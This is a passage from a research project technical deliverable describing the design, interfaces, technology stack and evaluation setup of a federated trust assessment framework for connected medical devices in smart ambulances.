Component providing the interface	Mitigation Strategies component		
Consumer components or External Entities	Risk Quantification Engine, OLISTIC Backend, OLISTIC Frontend		
Type of interface	REST		
Input/Output Data	Methods or endpoints of the interface	Parameters of the method	Return Object or Values of the method
	GET /api/v1/risk-assessments /{id}	Risk Assessment Identifier	Risk Assessment information
	POST /api/v1/risk-assessments /{id}	Risk Assessment Information	Risk Assessment Identifier and name
	DELETE /api/v1/risk-assessments /{id}	Risk Assessment Identifier	HTTP OK
	POST /api/v1/risk-assessments/{id}/rs-per-trust-property	<ol style="list-style-type: none"> 1. Base Risk assessment id (i.e., with no security control in place) 2. Query parameter 1: List of risk assessment ids to evaluate the effectiveness of security controls 3. Query parameter 2: Asset name 4. Query parameter 3: Trust property 5. Query parameter 4: Threat name 6. Query parameter 5: Vulnerability name 7. Query parameter 6: Initial Risk Level 	Risk Assessment comparison results

Table 6.2: Risk Assessment strategies component API (Extended to accommodate the filtering needs for deriving RTL constraints)

6.4 Federated TAF concepts and extrapolation in ENTRUST

The newly added functional requirements in Section 6.3.1 introduce the need for establishing a trust plane across the ENTRUST ecosystem. This trust plane aims to provide enriched trust assessment processes through the cross-domain exchange of trust-related information without compromising any privacy and security guarantees. Before delving into the design extensions to the core ENTRUST Trust Assessment Framework (as initially specified in [25]), the goal is to showcase the added value of the federated mode of operation through an indicative exemplary scenario inspired from one of the ENTRUST use cases.

Specifically, the merits of the federated TAF concept are better demonstrated in highly dynamic topologies that may span across different administrative domains. Hence, the exemplary scenario used for describing the introduction of the federation of TAF agents is originated from the smart ambulance use case. As part of the evaluation of the first version of the ENTRUST integrated framework ([28]), we demonstrated how a standalone TAF agent is able to cope with dynamic trust models as more smart ambulance nodes get enrolled in the CMD topology of one healthcare organization. Inspired from this setup, in what follows we introduce the scenario by explaining the trust assessment steps in the standalone mode of operation. We then extend this scenario to demonstrate how the federated ENTRUST TAF can support robust,

Figure 6.2: Standalone TAF instantiated in a smart-ambulance topology

cross-domain trust calculations. This serves as a basis for describing the design principles of the Federated TAF in Section 6.5. Furthermore, it sets the scene the specification of the interfaces implemented in this second version of the ENTRUST TAF (Section 6.6, which enable TAF-to-TAF communication within a multi-agent system model.

6.4.1 Exemplary scenario with standalone TAF

To showcase the importance of introducing federation functionalities in the Trust Assessment Framework, we apply it to the practical use case of a smart ambulance equipped with Connected Medical Devices (CMDs) for patient health monitoring and healthcare during transit. Specifically, we are emulating the in-ambulance CMD topology by having three Raspberry Pi 3+ devices, each one of which emulates the topology of a single ambulance. Each of these high-end devices are providing patient data to a backend device (acting as the healthcare backend organization), while at the same time the high-end device provides trust-related evidence to the TAF agent assessing the ambulance topologies (Figure 6.2). Core challenges evaluated include (i) the ability of the envisioned trust expression (e.g., through a trust model) to cope with dynamic environments where ambulances can enrol and detach from the hospital domain, and (ii) the evaluation of the trust assessment process under different trust requirements depending on the hospital organization.

Figure 6.2 depicts the trust assessment flow takes place in parallel to the medical application flow. This exemplary smart ambulance topology consists of medical - CMD - sensors (Medical Device 1 through n), connected to gateway devices (G) that relay the patient data (e.g., Respiratory and Blood pressure) to the associated healthcare organization backend. The backend triggers (Step 1) the initialization of the TAF, which in turn collects the trust relationships (referral and functional) of the topology and instantiates the trust model based on the trust requirements (e.g., RTL) of the organization. This enables the secure collection of the trustworthiness evidence (Step 2-3-4) relevant to the ATL expression for the target trust proposition. Collection of fresh evidence triggers the re-evaluation of the ATL expression, followed by the reporting of the trust decision to the backend (Step 5). Note that, while we assume that the TAF has access to fresh and observable evidence from the available trust sources, this is not always the case in multi-agent cross-domain use cases.

6.4.2 Towards the Federation of TAF agents

As reflected in one of the newly introduced functional requirements (see 6.3.1), one of the core assumptions introduced in the standalone TAF deployment has to do with the availability of fresh and observable data to the ENTRUST cloud, where the trust calculations are being performed. In addition to that, a second limitation has to do with the fact that each organization configures its own trust model instance in the standalone TAF to perform their own trust evaluations. However, this is based solely on the fresh evidence collected as part of the epoch where the CMD entities (e.g., smart ambulance topology) are enrolled in their own organization. This provides a limited perception over the trust propositions to be assessed as it excludes any historical data from past observations over the same topology.

To address these main challenges, we consider the deployment of a federation of TAF agents across different levels of the CMD ecosystem so as to enable the exchange of trust opinions, allowing the formation of a trust plane spanning from the far-edge CMD topologies up to the ENTRUST cloud. Figure 6.3 presents how the example defined in this section can be elevated to a federation of trust calculations. Instead of considering a single ENTRUST TAF instance serving the requests of an application of a healthcare organization, we identify different layers of TAF agents with different purposes:

- *TAF agent deployed as part of the smart ambulance topology.* This agent is tasked with the processing of the securely collected trustworthiness evidence pertaining to the correct behaviour of the CMD topology. In this layer, the TAF calculations focus on the quantification of trust opinions for atomic trust propositions; trust opinions that are intrinsically linked to the evidence that is being collected. Once new trust evaluations are available, they are transmitted to the TAF agent deployed in the corresponding healthcare organization.
- *TAF agent deployed in tandem with the healthcare organization's backend premises.* In this case the TAF agent processes the received evaluations over the atomic trust propositions and aggregates into the (composite) trust propositions that the backend application wishes to assess. All trust opinions are eventually made available to the Global TAF instance which maintains a recommendation system across all available CMD topologies.
- *Global TAF instantiated in the ENTRUST Cloud* This agent is responsible for keeping track of all the trust propositions that have been calculated as part of the overarching ENTRUST TAF. In fact, the Global TAF constitutes the cornerstone of this federation scheme, shaping a broader perception of the trustworthiness of the underlying topologies, while taking into consideration all the recommendations coming from the TAF agents in each healthcare organization. The endmost goal of the Global TAF is to provide accurate recommendations to subsequent TAF agents that need to calculate the trustworthiness of the CMD topology in a later stage.

The flow presented in Figure 6.3 showcase how the envisioned ENTRUST TAF federation scheme would enable a TAF instance deployed in tandem with a healthcare organization's application to receive additional trust opinions calculated from a Global TAF with wider perception over the target CMD topology. Inspired from the smart ambulance use case (Demonstrator #3.1), We consider the scenario where a smart ambulance is performing two patient transfers: the first one for healthcare organization A and the second for organization B. For the purposes of this scenario, it is assumed that before the configuration of each trust assessment process, the smart ambulance CMD topology has securely on-boarded the healthcare organization domain and has successfully downloaded the necessary trust models that correctly configure the underlying trust sources such as the ENTRUST attestation enablers (see [30] for a full description of the overarching ENTRUST framework).

As part of the smart ambulance operation under healthcare organization, the respective backend application configures the relevant TAF agent (Step 1). This TAF agent communicates with its corresponding

Figure 6.3: Federated TAF agents instantiated in a smart-ambulance topology

TAF agent deployed within the CMD topology. It subscribes to specific atomic trust propositions for which it requires evaluations (Step 2). Once the TAF agent collects the necessary evidence that satisfy the trust model of organization A (Step 3) it performs its internal TAF calculations (as already specified in [25]) and pushes the results to the domain TAF agent (Step 4). Now the TAF agent, that serves the trust assessment requests of the healthcare organization’s backend application, computes the requested ATL values and reports them back (Step 5). At the same time it relays the results of the conducted trust assessment to the Global TAF component residing in the ENTRUST Cloud. These ATL values constitute the trust opinions of domain’s A trust characterization over the smart ambulance CMD topology. Once discounted by the Global TAF calculations, these trust opinions can be used in the form of recommendation in future trust assessments of any TAF agent over the CMD topology of that particular Smart Ambulance. This is illustrated in Figure 6.3 as part of the second operation of the smart ambulance, this time under organization B. In this second flow, the domain-level TAF agent of organization B subscribes for new trust reports from the smart ambulance CMD topology. In this case, the trustworthiness evidence collected from the topology, as well as the calculations that are performed in the various TAF agents, comply with the requirements and trust models of organization B (Steps 7-10). However, in this case the domain-level TAF agent has the ability to consult the Global TAF’s perception for trust opinions regarding any of the trust propositions that are relevant for the envisioned ATL calculations (Step 11). Of course since these recommended trust opinions are now considered as historical data (capturing the trustworthiness of a CMD topology in the past) they need to be adjusted in terms of time sensitivity. This introduce the need for taking into consideration the temporal dimension of processed trust opinions, a feature that can be described as part of the trust model specification of a particular trust assessment process. Nevertheless, the availability of such a multi-agent system with referral trust opinions allows the domain-level TAF agent to provide more accurate trust decisions with respect to the properties under evaluation.

Figure 6.4: Representation of the requesting TAF A (left) and of the petitioned TAF B (right).

6.5 Design of Federated TAF

Inspired from the exemplary scenario in Section 6.4, this section addresses in more detail how the trust models could accommodate the federation functionalities that have been highlighted so far in the chapter. In this section we aim to consider the federation case from the perspective of TAF agents in different levels in the CMD ecosystem as depicted in Figure 6.3. The envisioned federation scheme for the ENTRUST TAF takes into consideration requesting TAF agents (e.g., TAF A) not simply querying for an atomic opinion relative to an unaccessible trust source, but also to require the result of a trust opinion computation performed by the petitioned TAF B.

Domain-level federation The TAF A (i.e., the Domain-level TAF agent) and TAF B (i.e., the TAF agent deployed within the CMD topology in the smart ambulance) are depicted in Figure 6.4. The TAF A model needs to assess the opinion $\omega_X^A|_{TAF_A}$, and it cannot evaluate it directly since it has not access to any relevant trust source. This time, TAF A knows that TAF B is able to assess the trust opinion $\omega_X^B|_{TAF_B}$. Then TAF A initiates the federation process, requesting $\omega_X^B|_{TAF_B}$.

TAF B receives the federation request. Notice that, by the TAF B perspective, this is in principle equivalent to receiving a TAR for $\omega_X^B|_{TAF_B}$ by an application. TAF B responds with the required $\omega_X^B|_{TAF_B}$. Of course the calculation of that trust opinion is a result of internal calculations conducted by TAF B (e.g., trust quantification of direct attestation evidence from the underlying CMD topology). Finally, TAF A is able to discount the received opinion $\omega_X^B|_{TAF_B}$ by $\omega_B^A|_{TAF_A}$, and to evaluate the required $\omega_X^A|_{TAF_A} = \omega_X^{A:B}|_{TAF_A}$. This response can be, then, sent to the requesting application that expects the trust reports as well as to any other subscribed TAF entity (e.g., Global TAF) as part of the federation scheme.

Trust model design requirements For the above process to take place the following requirements need to be fulfilled:

- The requesting TAF A needs to know that the petitioned TAF B is able to evaluate $\omega_X^B|_{TAF_B}$;

- The requesting TAF A and the petitioned TAF B reference trust opinion $\omega_X^B|_{TAF_B}$ in a unique way.

The previous requirements are satisfied if TAF A and TAF B share the notation and the semantics of the elements in Figure 6.4. Notice that the requesting TAF A explicitly encodes the fact that $\omega_X^B|_{TAF_B}$ is evaluated by TAF B. Notice that this implies that TAF A does not need to know how $\omega_X^B|_{TAF_B}$ is evaluated by TAF B, which is an advantage towards computation distribution across TAFs.

6.6 Interfaces of the Trust Assessment Framework

Here, we provide descriptions of the interfaces associated with the ENTRUST TAF, used in the context of the Trust Assessment process for communication and sharing relevant information between components. These can be split into two categories, (i) **External Interfaces**, which refer to the interfaces between the TAF and components that do not belong to the TAF, and (ii) **Internal Interfaces**, which refer to the interfaces between internal components of the TAF. In Section 6.6.1 we elaborate on the former category, and in Section 6.6.2 we elaborate on the latter category. The initial description of interfaces is specified in [25]; in this section we mention all interfaces for completeness, with a particular focus on those ones that enable the federation mode of TAF operation.

In Table 6.3, we provide a list of all the Internal and External Interfaces that will be analyzed throughout this section, as well as the TAF components that utilize each of the listed interfaces.

Interface/Service	TAM	TMM	TSM	TLEE	TDE
<i>External</i>					
DLT		✓	✓		
Trust Assessment Query Interface	✓				
Evidence Collection Interface			✓		
Node Discovery Interface	✓		✓		
<i>Internal</i>					
Trust Model Instance API	✓	✓	✓		
TLEE Invocation	✓			✓	
TDE Invocation	✓				✓

Table 6.3: List of internal and external interfaces of the ENTRUST Trust Assessment Framework.

6.6.1 External Interfaces

Here, we expand on the types of External Interfaces implemented in the ENTRUST TAF. Note that, upon entry of a device into the domain during the Pre-deployment Phase (as outlined in D2.2 [30]), the Trust Assessment process is automatically initiated. During the Runtime Phase, Trust Assessment is performed following the execution of an attestation scheme, in order to evaluate whether the device is in a trustworthy state. Here, we provide the interfaces of the TAF present in order to enable the external interactions with other ENTRUST components for the execution of the Trust Assessment process.

6.6.1.1 DLT

The DLT in ENTRUST represents the main repository for **Trust Model Templates**. Note that, while it is also possible for such Templates to be stored locally on the TAF, the ENTRUST DLT represents a remote source for the retrieval of Templates, in case the required ones are not available locally. From the perspective of the TAF, the DLT is seen as a *distributed, read-only key-value store in which Trust Model*

Templates are stored by ID and version number. Thus, the key for accessing a Template on the DLT consists of a tuple (trust model template identifier, trust model version), and the value of the Template stored in the DLT is a serialized representation of the actual Template.

In order to improve the performance of the TAF and alleviate the need to interact directly with the ledger, we assume a dedicated query interface (e.g., a HTTP-based web interface) on the DLT, which can be used in two possible scenarios: (i) *retrieving a specific Trust Model Template based on its ID*, and (ii) *retrieving a Trust Model Template based on its ID and referring to a specific version*. In both cases, the TAF receives a request for the establishment of a Trust Assessment session and, if a version is specified, that version is retrieved. Otherwise, the latest stored version is retrieved.

Compounding all the above, the DLT interfaces of the ENTRUST TAF are as follows:

- **Remote Resolution of a Trust Model Template (Figure 6.5):** This refers to the case where the TAF needs to retrieve the Trust Model Template using only its ID number. In this case, it retrieves the latest version stored on the DLT.
- **Remote Resolution of a Specific Version of a Trust Model Template (Figure 6.6):** This refers to the case where a version number is provided in addition to the ID number. In this case, this specific version is requested from the DLT.

Figure 6.5: Remote Resolution of a Trust Model Template.

Figure 6.6: Remote Resolution of a Specific Version of a Trust Model Template.

6.6.1.2 Trust Assessment Query Interface (TAQI)

The **Trust Assessment Query Interface (TAQI)** is a service of the TAF that enables other TAF instances to query Trust Assessment processes performed in that instance. Initially specified in [25] and implemented in this second version, the TAQI set of communication endpoints enable the realization of the federation scheme presented in Section 6.4. Through this API, a TAF agent exposes the interfaces that

enable TAF-to-TAF interaction and may be used by applications or application functions that are located in the same (Medical) Domain with the TAF. Therefore, the TAQI represents a stateless, pull-based, read-only query protocol with which the TAF can request trust values from a remote TAF. This interface is defined as follows:

- **Trust Assessment Query (TAQ) (Figure 6.7):** The TAQ interface enables a TAF instance to query a different TAF instance for a list of trust values. Thus, the TAQ needs to contain a selector to identify the values the querying TAF is interested in. This selector specifies a *Trust Model Template type*, as well as *potential paths with optional attributes* in corresponding Trust Model instance, in order to identify certain Trust Models and nodes. In addition, it is possible for such a query to use *wildcards*, which enable creating broader queries (e.g., queries for all Trust Models containing a node with a specific ID number). Note that, in case no corresponding trust values are identified, it is possible that the query returns an empty list.

Figure 6.7: Trust Assessment Query.

6.6.1.3 Evidence Collection Interface

As aforementioned, in order to perform Trust Assessment, the TAF of ENTRUST relies on the collection of trust evidence from various external **Trust Sources**. For instance, such trust evidence may originate from the Device Tracer during an attestation process, such as Configuration Integrity Verification (CIV) and Swarm Attestation. In this case, the remote attestation enabler is considered as a Trust Source. In general, as previously outlined, the **Trust Source Manager (TSM)** is responsible for receiving trust evidence through the **Evidence Collection Interface**, whose operational modes can be (i) *actively polling known nodes for evidence*, (ii) *subscribing for evidence notifications at specific nodes*, and (iii) *receiving evidence updates via one-way messages*. Thus, three external interfaces are defined for the Evidence Collection Interface based on these three operational modes:

- **Pull-based Evidence Collection (Figure 6.8):** In this case, the TAF is aware of a specific Trust Source (for example through the Node Discovery Interface, which will be detailed in Section 6.6.1.4, and queries the specific Trust Source for trust evidence.
- **Subscription-based Evidence Collection (Figure 6.9):** In contrast to pull-based evidence collection, which performs a one-time query for trust evidence to a Trust Source, the subscription-based interface requests evidence updates when changes are detected. Note that subscriptions time out after a certain time limit and need to be renewed in order to continue receiving updates.
- **One-way Evidence Collection (Figure 6.10):** In this type of interface, a Trust Source is able to send unsolicited trust evidence to the TAF, i.e., evidence that has not been specifically requested by the TAF. This evidence may be used by the TAF to perform Trust Assessment, if applicable.

Figure 6.8: Pull-based Evidence Collection.

Figure 6.9: Subscription-based Evidence Collection.

Figure 6.10: One-Way Evidence Notifications.

6.6.1.4 Node Discovery Interface

In order to collect the appropriate trust evidence to be able to make a decision regarding the trustworthiness of a device, the TAF needs to know what are the available Trust Sources that can be used to collect Trust Evidence. In this regard, the **Node Discovery Interface** enables the TAF to discover the presence of other entities in the network. The TAF uses this interface when it needs to query available communication partners and only acts as a client. Thus, the associated interface is formulated as follows:

- **Node Discovery Query (NDQ) (Figure 6.11):** The ENTRUST TAF may need to discover all nodes with specific characteristics (e.g., all nodes equipped with a PUF or all nodes using OP-TEE). Thus, an NDQ contains a potentially empty list of filters representing discoverable nodes that the TAF wants to query. These filters may include the identifier of the node or the type of the node, and returns a list of all matching nodes for which information is available.

Figure 6.11: Node Discovery Query.

6.6.2 Internal Interfaces

In the previous section, we provided a detailed overview of the external interfaces of the ENTRUST TAF, which enable the communication between the TAF and the outside world. Here, we focus on the **internal interfaces**, which define the types of communication between the internal components of the ENTRUST TAF.

6.6.2.1 Trust Assessment Manager

Recall that the TAM is a central component of the TAF which is responsible for the management and orchestration of various tasks related to the Trust Assessment process. In this regard, one of the core purposes of **decoupling and compartmentalizing internal functions of the TAF**. For this purpose, the following internal interface has been defined:

- **Trust Model Instance:** The ENTRUST TAF provides an internal, event-based API, that enables the TMM and TSM to distribute events about updates in their observations. Thus, this is an *asynchronous* interface that decouples the components and follows the *single writer principle*, based on which only the TAM has write access to all Trust Model instances. This approach also prevents write contention and concurrent writes between TMM and TSM, while the TAM is able to handle updates to the Trust Models either sequentially (for the same Trust Model) or in parallel (for different Trust Models).

6.6.2.2 TLEE Invocation

As previously outlined, the TLEE is the component of ENTRUST which is responsible for the actual calculation of the ATL, after all other internal and external processing actions have been performed, and all the necessary information is available for the Trust Assessment logic to be applied. Thus, in order to invoke the TLEE for the Trust Assessment to be performed, the following internal interface is defined:

- **TLEE Invocation:** As part of the overall Trust Assessment process, the TLEE exposes a `runTLEE()` function that can be called by the TAM, which is responsible for the orchestration of Trust Assessment tasks, as previously outlined. Specifically, when the TAM detects that the computation of an ATL is needed, it invokes the `runTLEE()` function when a Trust Model instance has been initialized and needs to allow the expression engine to prepare internal models and structures. In this case, the function is called with `nil` as the value for the `values` parameter and is expected to return an empty list of ATLs.

Specifically, the `runTLEE()` function is defined as follows:

```
function runTLEE(trustmodelID, version, fingerprint, structure, values) (6.1)
```

Next, we provide information on each of the input fields of the `runTLEE()` function, corresponding to the information needed for the initiation of the Trust Assessment process:

- `trustmodelID`: A unique identifier for the Trust Model instance inside the TAF.
- `version`: A number corresponding to the version of the Trust Model instance to be used. Note that a new version is issued when an update is performed, either in the structure or in the values of the Trust Model instance.
- `fingerprint`: A numeric fingerprint of the structure of the Trust Model instance, computed as a hash of its graph topology. Thus, if the fingerprints of two Trust Model instances are identical, they have the same topological structure. Conversely, the values of the Trust Model instance do not affect the fingerprint.
- `structure`: An internal representation of the structure of the Trust Model Instance. This is presented in the form of an adjacency list, i.e., a keyed list of Trust Object identifiers (IDs). Thus, each Trust Object is depicted as a list of tuples (target Trust Object ID, Trust Relationship ID) representing the outgoing edges from the Trust Object. Note that, if there are no Trust Relationships for a Trust Object, the tuple list for that Object is empty.
- `values`: A list of key-value pairs associating Trust Relationship IDs with the Trust Opinions associated with each Relationship.

After `runTLEE()` is invoked and the Trust Assessment logic is performed, the function returns a list of ATLS, represented as a key-value pair list containing the IDs of all concerned nodes and their corresponding ATL values, as computed by the TLEE. Note that, if `nil` is used as the `values` parameter, the function will return `nil`.

6.6.2.3 TDE Invocation

As aforementioned, the purpose of the TDE is to make a final trust decision on whether a device is trusted or not, based on the trustworthiness level calculations performed by the TLEE. To this end, the following internal interface has been defined for the invocation of the TDE:

- **TDE Invocation:** The TDE exposes the `runTDE()` function, which signifies the need for a Trust Decision to be made, after all Trust Assessment computations have been performed. Recall that a Trust Decision is made based on the comparison of the computed ATL with the RTL, upon the relevant Trust Model instance.

Specifically, the `runTDE()` function is defined as follows:

```
function runTDE(values) (6.2)
```

The `values` input of the `runTDE()` function is essentially a key-value map, where the keys are Trust Object IDs and the values are tuples of corresponding ATLS and RTLs for for each Trust Object. Thus, for each Trust Object whose trustworthiness needs to be evaluated, this table contains both its ATL and its RTL. This function is expected to return a map with the same number of entries as the input value, each one of which has *the Trust Object ID as a key and the final Trust Decision for that Object as its value*.

Depending on the trust model specification (i.e., primarily the set of target trust propositions), the output of the TDE may represent the trust attributes that characterize a particular CMD asset in the topology (e.g., High-end device has integrity, and availability guarantees). These trust-related attributes form the foundation of the Conformity Certificates that will be issued and distributed across the intended assets in the topology.

6.7 Realization of Trust Sources

One of the core points of extendability and interoperability is the Trust Source Manager (TSM) subcomponent of the ENTRUST TAF architecture. Its main functionality is to interact with the available Trust Sources that are relevant for a Trust Model and to quantify them in concrete trust opinions to be used either as part of a standalone TAF component or shared across a federated TAF deployment. In this second version of the ENTRUST TAF framework, we introduce the latest version of the TSM, which is capable of processing an arbitrary number of sessions with different trust sources, as well as various communication channels and modes of interaction.

As part of the first integrated ENTRUST framework [28], the main trust source that is employed in order to form the ATL calculations is the ENTRUST Attestation Agent. As part of the evaluation we consider the synchronous mode of operation, where upon request of a new trust assessment request, the TSM reaches out to the ENTRUST Attestation Agent to request for fresh attestation evidence pertaining to the integrity of high-end and low-end CMDs. Now, with the second version of the TSM the aim is to explore the benefits of having multiple trust sources with different communication modalities and evaluate their impact in the overall trust assessment process.

6.7.1 Trust Source Overview

The **Trust Source Manager (TSM)** is a component of the TAF responsible for managing **Trust Source Quantifier Instances (TSQ-I)**. As the TSM manages the TSQ-Is, it is aware of which instance needs evidence from which trust source. Therefore, the TSM handles the communication between the TAF and the trust sources. As already mentioned before, these are external entities that represent trust sources, such as a misbehavior detection system. The TSM either requests evidence or subscribes to the external entity so that it receives evidence as soon as the evidence has changed. The TSM also manages received evidence and forwards it to the corresponding TSQ-I. For this purpose, a unique identifier is necessary in each received evidence and which can be used by the TSM to map the evidence to the corresponding TSQ-I.

Based on the received evidence, each TSQ-I creates an atomic trust opinion. This is a subjective trust opinion calculated by a TSQ-I that has not been fused or discounted with trust opinions provided by other TSQ-Is. For one trust relationship in the trust model instance, several trust sources can be specified. The TSM is aware of which trust sources should be used for each trust relationship. After the corresponding TSQ-Is have calculated the atomic trust opinions for the specified trust sources of a trust relationship, the TSM fuses the atomic trust opinions to a trust opinion which is assigned to the corresponding trust relationship. For the fusion of the trust opinions, different fusion operators are possible. The operator to be used for the fusion is also specified in the trust model instance for each trust relationship. An overview of the described approach is shown in Figure 6.12.

Figure 6.12: High level overview of the trust source manager handling receiving evidence and calculating a trust opinion for a single trust relationship.

6.7.2 Trust Source Programming Model

The user-facing programming model for trust sources consists of two separate APIs: an API to connect trust sources to the TAF (Trust Source Provider API) and an API to quantify concrete evidence as part of a trust model (Trust Source Quantifier API).

The Trust Source Provider API is TAF-global, meaning that a specific implementation of that API enables a trust source for the entire TAF and all of its potential trust models. In contrast, the Trust Source Quantifier API is specific to a trust model implementation. This means that different trust model can use the same trust source, however they can use different quantification mechanisms to derive their trust opinions from that source. Even further, quantifiers are instantiated for each session and can be configured via optional parameters. So there could be two sessions that use the same type of trust model with the same trust sources and the same quantification mechanism, but the output of the trust source quantifiers of the two sessions could still vary due to different per-session configurations (e. g. changing the weights for certain evidence items).

6.7.2.1 Trust Source Provider API

The Trust Source Provider API defines how arbitrary trust sources can be integrated into the TAF. It specifies how any network message or network service endpoint can be turned into a trust source that can be processed and integrated by the TAF at runtime.

Although this API is implemented as an experimental, proof-of-concept feature, the final prototype of the TAF is shipped with hard-coded trust sources as defined by the specific use cases.

The Trust Source Provider API differentiates various types of trust sources, depending on the interaction scheme and semantics:

Pull-based sources are trust sources that require the TAF to actively request evidence. This can either be done periodically, or based on some internal event (e. g. a client application asking the TAF for latest assessments, which requires the TAF to update its knowledge about pull-based sources).

Push-based sources are trust sources that notify the TAF in case of updates. These notifications are in most cases either received via broadcasts or they require an active subscription of the TAF at the trust sources.

Another parameter is the scope of a trust source when used inside the TAF for populating trust models:

TAF-scoped sources are trust sources where a single instance of the trust source provider can be used for the entire TAF. Hence, evidence updates to various trust models can be fed this single provider.

Session-scoped sources are trust sources that require a specific subscription for a trust assessment session. This is usually the case when the session requires configurable subscriptions that are only valid for that session, and evidence updates cannot be shared with other sessions using the same trust source.

6.7.2.2 Trust Source Quantifier API

The Trust Source Quantifier API consists of a single, user-provided function that converts arbitrary evidence into an atomic trust opinion.

The function is stateless, but can access configuration parameters (e.g. weights) of the associated session:

6.8 Technology Stack

The following list showcases the main implementation features of the final prototype, in addition to the other fulfilled requirements evaluated in 6.9.

Generic Platform We have succeeded in implementing the TAF prototype as a single platform that covers all use cases, trust models, trust sources, and target environments with one code base and as a single-packaged software application. This also includes federation features.

Portability & Adaptability Being a generic software platform, the TAF provides builds for several hardware architectures as well as wide range of configuration options. This allows the TAF to be used on hardware-restricted architectures with a low level of configurable parallelism while the same implementation can also be executed on a many-core server with a different CPU architecture and using a high number of parallel workers. In doing so, the same TAF implementation can conceptually be run both centrally and in a federated manner, without any necessary code changes. Important configuration options include the level of parallelism (i.e. number of TAS workers), debugging configurations (i.e. log levels, auxiliary debug output files), and the configuration of other components (e.g. communication endpoints, TLEE version to be used).

Pluggable Trust Models An important design decision was the separation of trust model implementations and the TAF as a generic runtime platform to execute arbitrary trust models at runtime. This allows the implementation of new trust models against the APIs provided by the TAF without a strong coupling between the TAF internals and the trust model implementations. In fact, the Trust Source and Trust Model programming models provide an abstraction in such a way that all internal complexities of TAF are hidden and the trust models cannot access internal logic of the TAF beyond the defined APIs. New trust models can be added to the TAF simply by adding their code implementations into a new trust model folder of the plugin folder of the TAF.

6.8.1 Enabling Technologies

This section details the core technologies employed in order to realize both the internal and external functionalities of the ENTRUST TAF component.

6.8.1.1 Golang

One of the initial technical decisions concerned the selection of an appropriate programming language for implementing the TAF prototype. This choice was guided by four key requirements: (i) the language had to support high-level abstractions to facilitate rapid prototyping, (ii) it needed to run reliably across a range of architectures and systems, (iii) it had to offer efficient runtime performance, and (iv) it had to be compatible with execution inside a trusted execution environment, specifically Gramine.

Based on these criteria, an initial shortlist included C/C++, Rust, and Go. Scripting languages such as Python or Node.js were excluded early on due to their limited performance characteristics. Java and other JVM-based languages were also discarded, primarily because of insufficient support for Gramine.

Although Rust and C/C++ fulfilled the technical requirements, they posed a significant productivity barrier: the majority of the teams involved had limited practical experience with these languages. In contrast, Go provided a more accessible development environment without sacrificing runtime efficiency or deployment flexibility. As a result, Go was selected as the implementation language for the TAF prototype.

6.8.1.2 Apache Kafka

Kafka was chosen as the message layer for the project to provide a robust and language-agnostic abstraction for communication between the TAF and other external components. Its publish-subscribe model offers a clean separation between message producers and consumers, enabling flexible integration of heterogeneous components. Kafka supports arbitrary message contents, allowing us to transmit structured data such as JSON without imposing rigid serialization constraints. Additionally, the rich ecosystem of Kafka tooling—including connectors, monitoring solutions, and client libraries for numerous programming languages—facilitates development, testing, and operations across the entire prototype architecture.

6.8.1.3 JSON

To enable structured, interoperable communication between the TAF and external components, JSON was chosen as the message format. JSON offers several advantages in this context: it is language-agnostic, human-readable, and widely supported across platforms and programming environments.

To define and document message types, JSON Schemas were employed. This approach not only standardizes message structures but also facilitates automated validation during development and at runtime.

Within the TAF prototype and accompanying helper applications, established libraries and tooling were used to serialize and deserialize (marshal/unmarshal) JSON messages to and from native data structures. These tools also enforce schema compliance during message processing to ensure consistency and correctness across system boundaries.

6.9 Evaluation

This section assesses the operation of the ENTRUST TAF component as an isolated component. The goal here is to evaluate its behaviour in synthetic, and more complex scenarios compared to the ones considered as part of the evaluation in [28]. In what follows we present the evaluation results of the ENTRUST TAF component running as a standalone entity and serving trust assessment requests to a single healthcare organization. There are two evaluation dimensions that are considered: run-time performance and scalability.

In terms of the run-time performance, we had targeted a processing time (latency) below 100 ms for the arrival of new evidence up until the calculation of the corresponding ATL result value. For the scalability, we extended the run-time performance considerations by also adding more concurrent trust models (i.e. the TAF has to maintain multiple trust model in parallel) and higher update rates (i.e. new evidence arrives in higher frequencies).

We combined the analysis of both non-functional requirements by executing performance evaluations of the TAF.

6.9.1 Evaluation Goals

The specific goal of this evaluation is the measurement of *latency* (i.e. time between receiving an evidence update and providing a new ATL) as a function of (i) different trust models, (ii) varying numbers of concurrent trust models, (iii) varying frequencies of evidence updates, and (iv) different hardware setups.

This evaluation should also explore whether the original latency requirements can still be fulfilled under higher load scenarios.

6.9.2 Evaluation Setup

The experimental setup includes four parameters (i.e. trust model, scenario size, runtime environment, update rates) with varying experimental levels, as defined below:

Trust Model This parameter defines the trust model that runs on the evaluated TAF. For the measurements, we selected two distinct trust models:

- **STATIC@0.0.1**: A trust model that observes the trustworthiness of a target ambulances based upon attestation reports. This trust model is limited to two trust nodes and a single trust relationship for each instance. This reflects the typical static trust model that is evaluated in the context of the use cases in [28].
- **DYNAMIC@0.0.1**: A trust model that observes the trustworthiness of another ambulance as well as observations of that ambulance. For the evaluation, the number of observation is hardcoded to 16, meaning that each trust model instance consists of 18 trust nodes (16 observations, ego ambulance, target ambulance), as well as 33 trust relationships (relationships from ego and target ambulance to the observations, relationship from ego to target ambulance).

The second trust model is inspired from the smart ambulance use case (i.e., Demonstrator #3.1) constituting the main configuration for stress-testing the ENTRUST TAF operation. It is significantly more complex and involves a larger number of nodes, making it better suited for evaluating run-time performance and scalability. Given that the trust models for the rest of the use cases are much simpler and involves far fewer nodes, the performance results would outperform those obtained with

the more complex model. Therefore, this provides a more rigorous test and does not impose any limitations.

Scenario Size The scenario size defines how many other ambulances exist in the evaluation run. Thus, this parameter specifies the number of parallel trust model instances at runtime, as the TAF spawns a trust model instance for each observed entity (in both trust models). Scenarios range from sparse to very crowded setups:

- 16 other smart ambulances
- 64 other smart ambulances
- 256 other smart ambulances
- 1,024 other smart ambulances

Runtime Environment The runtime environment specifies the system on which the TAF gets executed. Here, we selected a server variant that corresponds to typical cloud premises as well as a hardware-constraint machine to emulate the high-end device acting as the gateway in the smart ambulance CMD topology.

- *server machine* (AMD EPYC 9274F with 24 cores and 48 threads, 192GB RAM with 10Gbit NIC) running Ubuntu 24.04 LTS (Kernel: 6.8.0-51-generic)
- *Raspberry Pi 3* (Cortex-A53 quad core CPU, 512 MB RAM with a 1Gbit NIC) running Raspberry Pi OS Lite / Debian 12 (Kernel: Linux 6.6.74+rpt-rpi-v8)

Update Rates This parameter specifies the frequency in which other entities send evidence updates to the TAF. Note that resulting total load in terms of induced throughput is the product of the scenario size and the update rate:

- 1 update per second
- 10 updates per second

